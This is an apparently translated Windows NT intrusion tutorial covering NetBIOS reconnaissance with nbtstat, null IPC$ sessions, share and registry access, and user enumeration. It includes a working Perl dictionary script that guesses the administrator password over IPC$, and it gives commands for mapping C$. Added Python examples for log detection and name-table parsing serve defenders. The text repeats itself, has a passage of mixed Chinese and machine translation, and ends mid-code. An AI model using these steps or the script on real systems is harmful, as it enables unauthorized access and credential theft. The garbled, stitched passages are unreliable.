Every intrusion involves logging on to a computer or network with root or admin privileges. The first step of an intrusion is usually a port scan (portscan) of the target computer. Attacks built on the ports that the target computer has open are quite effective. NT machines present port information differently from UNIX machines, so one can generally tell which operating system the target computer is running.
When attacking an NT-based network, NetBIOS is the preferred point of attack.
Use a port scanner, such as Sam, to see whether port 139 on the target computer is open. Port 139 is the "NetBIOS session" port, used for file and print sharing, and it is a potential weak point of NT. Note: port 139 is also open on Linux and UNIX systems running SAMBA, which provide similar file sharing. Once such a target computer has been found, the next step is to use the "nbtstat" command.
The NBTSTAT command is used to query information about NetBIOS; it can also clear the contents of the NetBIOS name cache and preload the LMHOSTS file into it. Running this command yields a great deal of useful information.
NBTSTAT command syntax: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]
Switches:
-a lists the name table of the remote computer with the given host name
-A lists the name table of the remote computer with the given IP address
-c lists the remote name cache, including IP addresses
-n lists local NetBIOS names
-r lists names resolved by broadcast and by WINS
-R clears and reloads the remote name cache
-S lists the session table with destination IP addresses
-s lists the session table, converting destination addresses to names
Each column of NBTSTAT output has a different meaning. The column headings are listed below, with an explanation of each:
Input
The number of bytes received.
Output
The number of bytes sent.
In/Out
Whether the connection originates from this computer (outbound) or from another system (inbound).
Life
The time remaining before your computer purges the entry from the name table.
Local Name
The local name used for the connection.
Remote Host
The name or IP address of the remote computer.
Type
A name can be one of two types: unique or group.
The last of the 16 characters of a NetBIOS name usually has a specific meaning, because the same name can appear several times on the same computer. The type field shows that last byte of the name in hexadecimal.
State
Your NetBIOS connection will be in one of the following states:
State          Meaning
Accepting      An incoming connection is being processed.
Associated     A connection endpoint has been established and your computer has associated it with an IP address.
Connected      You have reached the remote resource.
Connecting     Your session is trying to resolve the name of the target resource to an IP address.
Disconnected   Your computer has issued a disconnect request and is waiting for the remote computer to respond.
Disconnecting  Your connection is being closed.
Idle           The remote computer is open in the current session but is not currently accepting connections.
Inbound        An inbound session is trying to connect.
Listening      The remote computer is available.
Outbound       Your session is establishing a TCP connection.
Reconnecting   If the first attempt failed, this state is shown while the connection is retried.
Below is an example of the NBTSTAT command:
C:\>nbtstat -A xxxx
NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    DATARAT        <00>  UNIQUE      Registered
    R9LABS         <00>  GROUP       Registered
    DATARAT        <20>  UNIQUE      Registered
    DATARAT        <03>  UNIQUE      Registered
    GHOST          <03>  UNIQUE      Registered
    DATARAT        <01>  UNIQUE      Registered

    MAC Address = 00-00-00-00-00-00
What does the output above mean? In particular, what does the Type column represent? Look at the following table: what does it tell you?
Name                Number  Type  Usage
=================================================================
<computername>      00      U     Workstation Service
<computername>      01      U     Messenger Service
<\\_MSBROWSE_>      01      G     Master Browser
<computername>      03      U     Messenger Service
<computername>      06      U     RAS Server Service
<computername>      1F      U     NetDDE Service
<computername>      20      U     File Server Service
<computername>      21      U     RAS Client Service
<computername>      22      U     Exchange Interchange
<computername>      23      U     Exchange Store
<computername>      24      U     Exchange Directory
<computername>      30      U     Modem Sharing Server Service
<computername>      31      U     Modem Sharing Client Service
<computername>      43      U     SMS Client Remote Control
<computername>      44      U     SMS Admin Remote Control Tool
<computername>      45      U     SMS Client Remote Chat
<computername>      46      U     SMS Client Remote Transfer
<computername>      4C      U     DEC Pathworks TCPIP Service
<computername>      52      U     DEC Pathworks TCPIP Service
<computername>      87      U     Exchange MTA
<computername>      6A      U     Exchange IMC
<computername>      BE      U     Network Monitor Agent
<computername>      BF      U     Network Monitor Apps
<username>          03      U     Messenger Service
<domain>            00      G     Domain Name
<domain>            1B      U     Domain Master Browser
<domain>            1C      G     Domain Controllers
<domain>            1D      U     Master Browser
<domain>            1E      G     Browser Service Elections
<INet~Services>     1C      G     Internet Information Server
<IS~Computer_name>  00      U     Internet Information Server
<computername>      [2B]    U     Lotus Notes Server
IRISMULTICAST       [2F]    G     Lotus Notes
IRISNAMESERVER      [33]    G     Lotus Notes
Forte_$ND800ZA      [20]    U     DCA Irmalan Gateway Service
Unique (U): the name may have only one IP address assigned to it. On a network device the same name may be registered several times, but each suffix is unique, so each entry as a whole is unique.
Group (G): a normal group; the same name may exist with several IP addresses.
Multihomed (M): the name is unique, but because the same computer has several network interfaces, this configuration is required to allow it to register. There can be at most 25 addresses.
Internet Group (I): a special configuration of a group name, used to manage WinNT domain names.
Domain Name (D): new in NT 4.0.
This table explains the Type field of NBTSTAT output. By analysing NBTSTAT output in detail, a great deal of information about the target computer can be collected: which services it is running, and even which software packages are installed. From that, a gap to exploit can be found. The next step is to collect possible user names from the remote computer. A network logon has two parts, a user name and a password; once an intruder knows the user name, half the work is done.
By analysing NBTSTAT output, an intruder can obtain the name of any user logged on to that computer. In NBTSTAT output, entries of type <03> are user names or computer names, and an entry of type <20> indicates a shared resource.
The IPC$ (Inter-Process Communication) share is a standard hidden share on NT computers, used for communication between servers. NT computers use this share to connect to other computers and obtain various kinds of information. Intruders often take advantage of this by attacking through a null IPC session.
A fairly good IPC session tool is RedButton. It is a clever program that can log on to an NT system without presenting a user name and password. It runs on NT. Running it shows every available share, including the hidden admin shares (i.e. shares ending in "$"; by default several of these are available: C$, WINNT$, IPC$ and so on).
Note: the IPC$ share is not a share in the sense of a directory, disk or printer. The "$" you see marks a default admin share created when the system starts. IPC stands for "interprocess communications". The IPC$ share provides the ability to log on to the system. Note that any attempt to connect through IPC$ leaves a record in the EventLog, whether or not the logon succeeds.
Intruders use the following command to attack IPC$:
c:\>net use \\[target machine's IP address]\ipc$ /user:<name> <passwd>
When the connection is established, the username and password are sent for verification. If you log on as "Administrator", you need to guess the password.
The 'net' command can be used repeatedly to guess usernames and passwords:
c:\>net use \\xxx.xxx.xxx.xxx\ipc$ /user:<name> <passwd>
It can also be driven from a script:
open(IPC, "net use \\xxx.xxx.xxx.xxx\ipc$ /user:<name> <passwd> | ");
The NAT tool automates the above. NAT reads passwords from a dictionary file and attempts logons repeatedly in order to obtain an account. Of course, a script can be written to do what NAT does.
Perl is a good language for this: it is interpreted, like Java, but runs faster than Java. Unix systems can interpret it, and Perl for 95 and NT is now also available.
The following script can be used for account and password guessing.
----- begin script -----
# ipcchk.plx
# This script reads words from a text file and uses each word as the
# user name and password for an IPC$ connection. Successful connections
# are saved to a log file. The script does not validate its argument,
# so a valid IP address of the target machine must be supplied.
#
# Usage: c:\>perl ipcchk.plx [target machine's IP address]
if (length($ARGV[0]) == 0) {
    print "Usage: perl ipcchk.plx [ipaddr]\n";
    exit(0);
}
open(TEST, "names.txt") || die "Could not open file.";
open(LOG, ">>ipc.log") || die "Could not open log.";
$server = $ARGV[0];
while (<TEST>) {
    $name = $_;
    chop($name);    # strip the trailing newline from the word
    # print "net use \\\\$server\\ipc\$ /user:administrator $name | \n";
    open(IPC, "net use \\\\$server\\ipc\$ /user:administrator $name | ");
    while (<IPC>) {
        if (grep(/successfully/, $_)) {
            print LOG "$server accepts connections for password $name\n";
            # delete a successful connection to avoid multiple connections to
            # the same machine
            open(DEL, "net use \\\\$server\\ipc\$ /d | ");
            close(DEL);
        }
    }
    close(IPC);
}
close(LOG);
close(TEST);
----- end script -----
Of course, once you understand the principle, a program with the same functionality can be written in C or BASIC.
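The note above that every IPC$ connection attempt is recorded in the EventLog, whether or not it succeeds, is what makes the dictionary guessing described here (NAT, ipcchk.plx) detectable on the server side. The following Python example is added here and is not part of the original article or of any tool it names. It runs a sliding-window counter over a constructed, simplified log format (not real NT EventLog records; the field names src, user and share are assumptions) and raises an alert when one source address makes five or more failed IPC$ logons for the same account within a minute, and a second alert if that source then logs on successfully, which is the moment the script above would write to its log file.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not real NT EventLog output): one record per IPC$
# logon attempt with timestamp, outcome, source address, account and share.
SAMPLE_LOG = """\
1998-11-16 12:04:01 FAILURE src=10.0.0.5 user=administrator share=IPC$
1998-11-16 12:04:02 FAILURE src=10.0.0.5 user=administrator share=IPC$
1998-11-16 12:04:02 FAILURE src=10.0.0.5 user=administrator share=IPC$
1998-11-16 12:04:03 FAILURE src=10.0.0.5 user=administrator share=IPC$
1998-11-16 12:04:03 FAILURE src=10.0.0.5 user=administrator share=IPC$
1998-11-16 12:04:04 SUCCESS src=10.0.0.5 user=administrator share=IPC$
1998-11-16 12:10:00 FAILURE src=10.0.0.9 user=laurel share=IPC$
1998-11-16 13:30:00 SUCCESS src=10.0.0.9 user=laurel share=IPC$
"""

WINDOW = timedelta(seconds=60)   # sliding window over which failures are counted
THRESHOLD = 5                    # failures within WINDOW that count as guessing


def parse_line(line):
    """Split one constructed log line into a record dict."""
    date, clock, outcome, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return {"ts": datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S"),
            "outcome": outcome, "src": kv["src"],
            "user": kv["user"], "share": kv["share"]}


def detect_guessing(log_text, window=WINDOW, threshold=THRESHOLD):
    """Return alerts as (kind, src, user, timestamp) tuples.

    'guessing' fires once per (src, user) pair when the failure count inside
    the window reaches the threshold; 'success_after_guessing' fires when a
    pair already flagged for guessing then logs on successfully.
    """
    failures = defaultdict(deque)   # (src, user) -> timestamps of recent failures
    flagged = set()
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        key = (rec["src"], rec["user"])
        recent = failures[key]
        # Drop failures that have aged out of the window.
        while recent and rec["ts"] - recent[0] > window:
            recent.popleft()
        if rec["outcome"] == "FAILURE":
            recent.append(rec["ts"])
            if len(recent) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("guessing", rec["src"], rec["user"], rec["ts"]))
        elif rec["outcome"] == "SUCCESS" and key in flagged:
            alerts.append(("success_after_guessing", rec["src"], rec["user"], rec["ts"]))
    return alerts


if __name__ == "__main__":
    for kind, src, user, ts in detect_guessing(SAMPLE_LOG):
        print(f"{ts} {kind}: {src} -> {user}")
```

The single failure from 10.0.0.9 followed by a success an hour later produces no alert, because the failure has aged out of the window; a real deployment would key the counter on the source address alone as well, since a dictionary run may rotate through several account names.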
Once inside, an intruder can do far more than collect user names.
Next, the intruder will try to see which shared resources on the target computer can be used. The following command does this:
c:\>net view \\[target computer's IP address]
Depending on the target computer's security policy, this command may be refused. Consider the following example:
C:\>net view \\0.0.0.0
System error 5 has occurred.
Access is denied.

C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.

C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0

Share name   Type   Used as   Comment
-------------------------------------------------------------------------------
Accelerator  Disk             Agent Accelerator share for Seagate backup
Inetpub      Disk
mirc         Disk
NETLOGON     Disk             Logon server share
www_pages    Disk
The command completed successfully.
As the example shows, the server's list of shares cannot be accessed until a null IPC session has been established. At this point you may be wondering how dangerous such IPC connections are, but so far our knowledge of IPC is still very basic; we are only beginning to explore what IPC shares make possible.
If other shared resources exist, the net command can connect to them:
c:\>net use x: \\[ipaddr]\[share]
If that fails, use the attack method described above.
Once the IPC$ share has been connected successfully, the next command is:
c:\>net use g: \\xxx.xxx.xxx.xxx\c$
With the C$ share obtained and mapped to g:, type:
c:\>dir g: /p
and the entire contents of that directory are displayed.
After a successful IPC$ connection, click Start -> Run and type regedit. Choose Registry -> Connect Network Registry and enter the IP address of that machine. After a moment the target computer's Registry is displayed.
***************************************************************************
The first step a network intruder usually takes is to scan the target machine or network with a port scanner. It is surprising how methodical attacks based on the target's open ports are. You should be aware that NT machines display a different standard set of open ports than Unix machines. Intruders know how to read a port scanner's report and can conclude with fair accuracy whether the target is an NT machine or a Unix machine. There are exceptions, but in general this works. Several tools for remotely identifying machines have been released recently, but that capability is not yet available for NT.
When attacking an NT-based network, NetBIOS is often the preferred target, so NetBIOS is the first important topic this article discusses. Gathering information with NetBIOS is fairly easy, although it takes a little time: NetBIOS is generally regarded as a high-overhead, bulky protocol and is often slow, which is why it takes time. If the port scanner reports that port 139 is open on the target machine, what follows is a very natural process. The first step is to issue the NBTSTAT command.
The NBTSTAT command can be used to query network machines for NetBIOS information. It can also be used to purge the NetBIOS cache and preload the LMHOSTS file. This command is very useful when carrying out security checks.
Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]
Parameters:
-a lists the remote computer's name table given its host name.
-A lists the remote computer's name table given its IP address.
-c lists the remote name cache, including IP addresses.
-n lists local NetBIOS names.
-r lists names resolved by broadcast and by WINS.
-R purges and reloads the remote cache name table.
-S lists the session table with destination IP addresses.
-s lists the session table, converting destination addresses to names.
The column headings generated by NBTSTAT have the following meanings:
Input
The number of bytes received.
Output
The number of bytes sent.
In/Out
Whether the connection was made from this computer (outbound) or from another system to the local computer (inbound).
Life
The time remaining before the computer purges the entry from the name table cache.
Local Name
The local NetBIOS name used for the connection.
Remote Host
The name or IP address of the remote host.
Type
A name can have one of two types: unique or group.
In a 16-character NetBIOS name the last byte often has a specific meaning, because the same name can appear several times on the same computer. This field shows that last byte of the name in hexadecimal.
State
A NetBIOS connection will be shown in one of the following states:
State: Meaning
Accepting: an incoming connection is in progress.
Associated: a connection endpoint has been established and the computer has been associated with an IP address.
Connected: this is a good state! It means you are connected to the remote resource.
Connecting: your session is trying to resolve the name-to-IP-address mapping of the destination resource.
Disconnected: your computer has requested a disconnect and is waiting for the remote computer to respond in kind.
Disconnecting: your connection is being closed.
Idle: the remote computer is open in the current session but is not currently accepting connections.
Inbound: an inbound session is trying to connect.
Listening: the remote computer is available.
Outbound: your session is establishing a TCP connection.
Reconnecting: if the first connection attempt failed, this state is shown while a reconnection is attempted.
Below is a sample NBTSTAT response from a machine:
C:\>nbtstat -A xxxx
NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    DATARAT        <00>  UNIQUE      Registered
    R9LABS         <00>  GROUP       Registered
    DATARAT        <20>  UNIQUE      Registered
    DATARAT        <03>  UNIQUE      Registered
    GHOST          <03>  UNIQUE      Registered
    DATARAT        <01>  UNIQUE      Registered

    MAC Address = 00-00-00-00-00-00
What can you learn about this machine from the following table?
Number  Type  Usage
00      U     Workstation Service
01      U     Messenger Service
\\_MSBROWSE_  01  G  Master Browser
03      U     Messenger Service
06      U     RAS Server Service
1F      U     NetDDE Service
20      U     File Server Service
21      U     RAS Client Service
22      U     Exchange Interchange
23      U     Exchange Store
24      U     Exchange Directory
30      U     Modem Sharing Server Service
31      U     Modem Sharing Client Service
43      U     SMS Client Remote Control
44      U     SMS Admin Remote Control Tool
45      U     SMS Client Remote Chat
46      U     SMS Client Remote Transfer
4C      U     DEC Pathworks TCP/IP Service
52      U     DEC Pathworks TCP/IP Service
87      U     Exchange MTA
6A      U     Exchange IMC
BE      U     Network Monitor Agent
BF      U     Network Monitor Application
03      U     Messenger Service
00      G     Domain Name
1B      U     Domain Master Browser
1C      G     Domain Controllers
1D      U     Master Browser
1E      G     Browser Service Elections
1C      G     Internet Information Server
00      U     Internet Information Server
[2B]    U     Lotus Notes Server
IRISMULTICAST   [2F]  G  Lotus Notes
IRISNAMESERVER  [33]  G  Lotus Notes
Forte_$ND800ZA  [20]  U  DCA Irmalan Gateway Service
Unique (U): the name may have only one IP address assigned to it. On a network device, a registered name may appear several times, but its suffix is unique, so the name as a whole is unique.
Group (G): a normal group; one name may have many IP addresses.
Multihomed (M): the name is unique, but because the same computer has several network interfaces, this configuration allows it to register. The maximum number of addresses is 25.
Internet Group (I): a special configuration of a group name, used to manage WinNT domain names.
Domain Name (D): new in NT 4.0.
Using the table above and the output obtained from nbtstat, a network intruder can begin to gather information about your machine. With this information the intruder can determine, to some extent, which services are running on the target machine and sometimes which software packages are installed. Traditionally, every service or major software package has some vulnerability, so this type of information is certainly useful to an intruder.
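Both halves of this article present the same two artefacts, the nbtstat -A name table and the suffix table, and leave it to the reader to combine them. The following Python example is added here and is not part of the original article or of any tool it names. It parses the sample nbtstat -A output reproduced on this page (embedded below as a constructed string), decodes each entry with the page's suffix table, and summarises what an administrator reading their own host's name table can conclude: the computer's name, which UNIQUE <03> entries are logged-on user names rather than the machine name, the domain or workgroup, and whether the File Server Service (<20>) is registered. The suffix dictionary holds only the entries needed for the sample; the field and function names are the example's own.

```python
import re

# Suffix-to-usage table taken from the article's table; only the entries
# needed to decode the sample output are included. The key is
# (hex suffix, type letter) where the type is U (unique) or G (group).
SUFFIX_USAGE = {
    ("00", "U"): "Workstation Service",
    ("00", "G"): "Domain Name",
    ("01", "U"): "Messenger Service",
    ("01", "G"): "Master Browser",
    ("03", "U"): "Messenger Service",
    ("06", "U"): "RAS Server Service",
    ("1B", "U"): "Domain Master Browser",
    ("1C", "G"): "Domain Controllers",
    ("1D", "U"): "Master Browser",
    ("1E", "G"): "Browser Service Elections",
    ("1F", "U"): "NetDDE Service",
    ("20", "U"): "File Server Service",
    ("21", "U"): "RAS Client Service",
}

# Constructed sample: the nbtstat -A output reproduced in the article.
SAMPLE_OUTPUT = """\
NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    DATARAT        <00>  UNIQUE      Registered
    R9LABS         <00>  GROUP       Registered
    DATARAT        <20>  UNIQUE      Registered
    DATARAT        <03>  UNIQUE      Registered
    GHOST          <03>  UNIQUE      Registered
    DATARAT        <01>  UNIQUE      Registered

    MAC Address = 00-00-00-00-00-00
"""

# One name-table row: name, <hex suffix>, UNIQUE|GROUP, status.
ENTRY_RE = re.compile(
    r"^[ \t]*(\S+)[ \t]+<([0-9A-Fa-f]{2})>[ \t]+(UNIQUE|GROUP)[ \t]+(\w+)",
    re.MULTILINE)


def parse_name_table(text):
    """Return one dict per registered name found in nbtstat -A output."""
    entries = []
    for m in ENTRY_RE.finditer(text):
        name, suffix, kind, status = m.groups()
        entries.append({"name": name, "suffix": suffix.upper(),
                        "type": kind[0], "status": status})
    return entries


def decode_name_table(text):
    """Attach the usage from SUFFIX_USAGE to every entry; unknown suffixes are kept."""
    decoded = []
    for e in parse_name_table(text):
        usage = SUFFIX_USAGE.get((e["suffix"], e["type"]), "unknown")
        decoded.append((e["name"], e["suffix"], e["type"], usage))
    return decoded


def summarize(text):
    """What the name table reveals about the host, read with the suffix table."""
    decoded = decode_name_table(text)
    # The host's own name is registered as UNIQUE <00> (Workstation Service).
    computer = next((n for n, s, t, _ in decoded if s == "00" and t == "U"), None)
    # UNIQUE <03> is the Messenger Service name: the computer name plus the
    # name of every logged-on user, so the extra <03> entries are users.
    users = sorted({n for n, s, t, _ in decoded
                    if s == "03" and t == "U" and n != computer})
    # GROUP <00> is the domain or workgroup the host belongs to.
    groups = sorted({n for n, s, t, _ in decoded if s == "00" and t == "G"})
    # UNIQUE <20> means the File Server Service is registered: file sharing is exposed.
    sharing = any(s == "20" and t == "U" for _, s, t, _ in decoded)
    return {"computer": computer, "logged_on_users": users,
            "domain_or_workgroup": groups, "file_sharing_exposed": sharing}


if __name__ == "__main__":
    for row in decode_name_table(SAMPLE_OUTPUT):
        print("%-16s <%s> %s  %s" % row)
    print(summarize(SAMPLE_OUTPUT))
```

Run against the page's sample, the summary reports DATARAT as the host, GHOST as a logged-on user, R9LABS as the workgroup or domain, and file sharing exposed, which is exactly the reading the article asks you to make by hand.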
========================================
The second logical step is to collect possible user names from the remote machine. A network logon consists of two parts, a user name and a password; once an intruder has a list of valid users, half of a valid logon is in hand. Using the nbtstat command, the intruder can obtain the logon name of anyone registered locally on that machine: in nbtstat output, entries with the <03> identifier are user names or machine names. User names can also be collected through a null IPC session and the SID tools (see "SID Tools", Appendix B, for details). The IPC$ (inter-process communication) share is a standard hidden share on NT hosts, used mainly for server-to-server communication; NT hosts connect to each other through it to obtain whatever information they need. As with many design features of operating systems, intruders have learned to use this one for their own ends. By connecting to this share, an intruder can technically establish a valid connection to your server, and by making a null connection to the share can do so without presenting any credentials at all.
To make a null connection to the IPC$ share, the intruder issues the following command at a command prompt:
c:\>net use \\[IP address of target host]\ipc$ "" /user:""
If the connection succeeds, the intruder has many things to do, not only collecting the user list, but that is where he starts. As noted above, this method requires a null IPC session and the SID tools. The SID tools, written by Evgenii Rudnyi, consist of two separate programs, User2sid and Sid2user. User2sid takes an account or group name and gives you the corresponding SID; Sid2user takes a SID and gives you the corresponding user or group name. Used as stand-alone tools, the process is manual and takes a lot of time. Userlist.pl, a perl script written by monix, automates the SID process and greatly reduces the time the intruder spends collecting this information.
At this point the intruder knows which services are running on the remote machine and (to a limited extent) which major software packages are installed, and also has a list of valid user names and groups on the machine. That may already seem like everything an outsider could learn about your network, but the null IPC session leaves other openings for information gathering. The Rhino9 team has been able to retrieve all of a remote machine's built-in security policy settings: account lockout, minimum password length, password age, password uniqueness, and for every user the groups they belong to and their personal domain restrictions can all be obtained through a null IPC session. This information-gathering capability will be provided in the soon-to-be-released Leviathan tool (written by the Rhino9 team). Some currently available tools that can gather further information through a null IPC session are discussed below.
With a null IPC session, an intruder can also obtain the list of network shares, which would otherwise be unavailable. The intruder wants to know which network shares are available on your machine, and collects this information with the following standard net view command:
c:\>net view \\[remote host's IP address]
Depending on the target machine's security policy, this list may or may not be refused. For example:
C:\>net view \\0.0.0.0
System error 5 has occurred.
Access is denied.

C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.

C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0

Share name   Type   Used as   Comment
-------------------------------------------------------------------------------
Accelerator  Disk             Agent Accelerator share for Seagate backup
Inetpub      Disk
mirc         Disk
NETLOGON     Disk             Logon server share
www_pages    Disk
The command completed successfully.
正如您所看到的,该服务器上的共享列表在建立了空IPC会话后才可用。 As you can see, the list of shares on the server in the establishment of the IPC null session to be available. 这时,您就会意识到这个IPC连接有多么的危险,但我们现在已经掌握的IPC方法实际上是很基本的方法。 At this time, you will realize how this risk IPC connection, but now we have mastered the IPC method is actually a very basic way. 与IPC共享一起出现的可能性还有待进一步研究。 Appear together with the possibility of shared IPC remains to be further studied. WindowsNT 4.0资源工具的发布使得象管理员和网络入侵者这样的人能够用到新的工具。 WindowsNT 4.0 Resource Kit release allows administrators and network intruders such as people who can use the new tools. 下面对一些资源工具实用程序进行描述。 The following resource tool utility of some description. Rhino9小组运用这些实用程序与IPC$空会话一起收集信息。 Rhino9 team to use these utilities together with the IPC $ null session to gather information. 当您阅读这些工具的描述以及它们所提供的信息时,请记住:所采用的空会话不向远程网络提供任何真实的身份证明。 When you read a description of these tools and information they provide, please remember: the use of null session to the remote network does not provide any real identity.
UsrStat: this command-line utility displays the user name, full name, and date and time of last logon for every user in a given domain. Below is an actual cut-and-paste of this tool run against a remote network through a null IPC session:
C:\NTRESKIT>usrstat domain4
Users at \\STUDENT4
Administrator - - logon: Tue Nov 17 0855 1998
Guest - - logon: Mon Nov 16 124:04 1998
IUSR_STUDENT4 - Internet Guest Account - logon: Mon Nov 16 1596 1998
IWAM_STUDENT4 - Web Application Manager account - logon: Never
laurel - - logon: Never
megan - - logon: Never
To deepen the reader's understanding, let's look at how this whole capture came about. Before the actual attack, a mapping for the Student4 machine and its domain activity status was placed in the LMHOSTS file using the #PRE/#DOM tags (described in detail below). The entry was then preloaded into the NetBIOS cache and a null IPC session was established. As you can see, the command is issued against the domain name. Finally, the tool queries the primary domain controller for this information.
Other penetration methods involving the IPC share include opening the remote machine's registry and running User Manager for Domains against it. A null IPC connection gives a network intruder access to your registry. Once the null IPC session is established, the intruder can start his local Registry Editor utility and try the Connect Network Registry option. If the attempt succeeds, the intruder has read-only, or even read/write, access to certain registry keys. Either way, even read-only access to the registry is very harmful from a security standpoint.
Network intruders also use the IPC/User Manager for Domains method. It is little known; we cover it here because it is a very effective intrusion method. It involves a null IPC session and an entry in the LMHOSTS file. The LMHOSTS file is (normally) a local file on Windows-based machines that maps NetBIOS names to IP addresses. LMHOSTS is mainly used in non-WINS environments or on clients that cannot use WINS, but in practice a network intruder can use this file in many different ways. The different uses of the LMHOSTS file are discussed below.
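Because LMHOSTS entries take precedence over WINS and broadcast name resolution, an administrator reviewing a machine wants to know which names are pinned, preloaded (#PRE) and marked as domain controllers (#DOM). The following parser is an added example written for this page, not part of the Rhino9 document; it assumes the standard LMHOSTS line syntax (IP address, NetBIOS name, optional #PRE and #DOM:domain tags, anything else after # being a comment), and the sample file contents are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed LMHOSTS contents for the example (addresses are documentation ranges).
SAMPLE_LMHOSTS = """\
# constructed LMHOSTS for the example
192.0.2.5     fileserv            # plain mapping, not preloaded
192.0.2.10    STUDENT4   #PRE #DOM:DOMAIN4    # pinned domain controller
198.51.100.7  printsrv   #PRE
#INCLUDE \\\\192.0.2.5\\public\\lmhosts
"""

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


@dataclass
class LmhostsEntry:
    ip: str
    name: str
    preload: bool          # #PRE: loaded into the NetBIOS name cache by nbtstat -R
    domain: Optional[str]  # #DOM:<domain>: the name is treated as a domain controller
    line_no: int


def parse_lmhosts(text: str) -> List[LmhostsEntry]:
    """Parse LMHOSTS text into entries; comment and directive lines are skipped."""
    entries: List[LmhostsEntry] = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank, comment, or a directive such as #INCLUDE
        fields = line.split()
        if len(fields) < 2 or not IPV4_RE.match(fields[0]):
            continue  # not "<ip> <name> ..."
        ip, name = fields[0], fields[1].upper()
        preload, domain = False, None
        for tag in fields[2:]:
            upper = tag.upper()
            if upper == "#PRE":
                preload = True
            elif upper.startswith("#DOM:"):
                domain = tag[5:].upper()
            elif tag.startswith("#"):
                break  # any other '#' starts a trailing comment
        entries.append(LmhostsEntry(ip, name, preload, domain, line_no))
    return entries


def pinned_domain_controllers(entries: List[LmhostsEntry]) -> List[LmhostsEntry]:
    """Entries that are both preloaded and marked #DOM: these silently decide
    which host a client treats as its domain controller, so each one should be
    known and expected."""
    return [e for e in entries if e.preload and e.domain]


if __name__ == "__main__":
    for entry in pinned_domain_controllers(parse_lmhosts(SAMPLE_LMHOSTS)):
        print(f"line {entry.line_no}: {entry.name} -> {entry.ip} (#DOM:{entry.domain})")
```

Running it over the constructed sample reports only the STUDENT4 line; the plain mapping and the #PRE-only printer entry are parsed but not flagged.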
===========================================================================
Now we discuss how the LMHOSTS file is used in this method. It is an excellent illustration, because it shows how the techniques introduced earlier are combined with this one to achieve the intruder's goal. We start with the port scanner: assuming port 139 is open, the attacker issues an nbtstat command. From the nbtstat results he then collects the remote machine's NetBIOS names.
Let's look at the nbtstat results, which are the same as before:
C:\>nbtstat -A xxxx

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
DATARAT        <00>  UNIQUE      Registered
R9LABS         <00>  GROUP       Registered
DATARAT        <20>  UNIQUE      Registered
DATARAT        <03>  UNIQUE      Registered
GHOST          <03>  UNIQUE      Registered
DATARAT        <01>  UNIQUE      Registered

MAC Address = 00-00-00-00-00-00
Examining the nbtstat output, we find the <03> identifier. If someone is logged on locally to the machine, you will see two <03> entries. Normally the first <03> is the machine's NetBIOS name and the second is the name of the locally logged-on user. At this point the intruder puts a mapping of this machine's NetBIOS name and IP address into his local LMHOSTS file, ending the entry with the #PRE and #DOM tags. #PRE means the entry should be preloaded into the NetBIOS cache; #DOM marks domain activity. The intruder then issues an nbtstat -R command to preload the entry into his cache. Technically, preloading makes the entry look as if it had already been resolved by some network function, and it makes name resolution faster.
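The name-table reading above can be made mechanical: the suffix and type of each registered name tell an administrator exactly what an anonymous nbtstat -A query gives away about a host. The parser below is an added example written for this page, not part of the Rhino9 document. Its input is the nbtstat output quoted above, and it assumes the standard NetBIOS suffix meanings (<00> UNIQUE workstation name, <00> GROUP domain or workgroup, <20> UNIQUE server service, <03> UNIQUE messenger service for the machine and for a logged-on user); suffixes it does not know are reported as-is rather than guessed.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Input: the nbtstat -A output quoted in the text above.
SAMPLE_NBTSTAT = """\
C:\\>nbtstat -A xxxx

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
DATARAT        <00>  UNIQUE      Registered
R9LABS         <00>  GROUP       Registered
DATARAT        <20>  UNIQUE      Registered
DATARAT        <03>  UNIQUE      Registered
GHOST          <03>  UNIQUE      Registered
DATARAT        <01>  UNIQUE      Registered

MAC Address = 00-00-00-00-00-00
"""

# One name-table row: NAME <suffix> UNIQUE|GROUP Status
ROW_RE = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")
MAC_RE = re.compile(r"^\s*MAC Address\s*=\s*(\S+)")


@dataclass
class NbtExposure:
    """What an unauthenticated nbtstat -A query reveals about a host."""
    machine_name: Optional[str] = None         # <00> UNIQUE: Workstation service
    domain_or_workgroup: Optional[str] = None  # <00> GROUP
    file_sharing: bool = False                 # <20> UNIQUE: Server service (shares offered)
    logged_on_user: Optional[str] = None       # second <03> UNIQUE name (Messenger service)
    mac_address: Optional[str] = None
    other: List[Tuple[str, str, str]] = field(default_factory=list)  # unclassified rows


def parse_nbtstat(text: str) -> NbtExposure:
    exp = NbtExposure()
    messenger: List[str] = []  # <03> UNIQUE names, in order of appearance
    for line in text.splitlines():
        mac = MAC_RE.match(line)
        if mac:
            exp.mac_address = mac.group(1)
            continue
        row = ROW_RE.match(line)
        if not row:
            continue  # banner, column header, separator or blank line
        name, suffix, kind, _status = row.groups()
        suffix = suffix.upper()
        if suffix == "00" and kind == "UNIQUE":
            exp.machine_name = name
        elif suffix == "00" and kind == "GROUP":
            exp.domain_or_workgroup = name
        elif suffix == "20" and kind == "UNIQUE":
            exp.file_sharing = True
        elif suffix == "03" and kind == "UNIQUE":
            messenger.append(name)
        else:
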